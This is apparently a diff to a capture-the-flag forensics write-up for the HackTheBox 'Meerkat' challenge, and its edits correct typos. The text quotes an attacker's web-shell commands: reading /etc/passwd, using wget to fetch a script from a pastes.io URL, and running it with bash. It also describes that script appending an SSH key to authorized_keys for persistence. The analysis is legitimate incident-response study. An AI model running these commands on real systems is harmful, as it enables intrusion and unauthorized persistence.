TechnoSavage/CTF/HTB/Sherlocks_writeups/meerkat.md

 ## If any, which text sharing site did the attacker utilise?

-After successful authentication the attacket makes a POST request to upload **"rce_api_extension.zip"** then follows up with a few GET requests including **cmd=whoami**, **"cmd=cat%20/etc/passwd"** and ***"cmd=wget%20https://pastes.io/raw/bx5gcr0et8"*** then subsequently executes this file with **"cmd=bash%20bx5gcr0et8"**
+After successful authentication the attacker makes a POST request to upload **"rce_api_extension.zip"** then follows up with a few GET requests including **cmd=whoami**, **"cmd=cat%20/etc/passwd"** and ***"cmd=wget%20https://pastes.io/raw/bx5gcr0et8"*** then subsequently executes this file with **"cmd=bash%20bx5gcr0et8"**

 ### Answer: `pastes.io`

 ## Please provide the filename of the public key used by the attacker to gain persistence on our host.

-Following the link that the wget command used leads to a page with a simple bash script containing a curl command to append an SSH key to authorized_keys and restart the SSH service
+Following the link that the wget command uses leads to a page with a simple bash script containing a curl command to append an SSH key to authorized_keys and restart the SSH service

 ```
 #!/bin/bash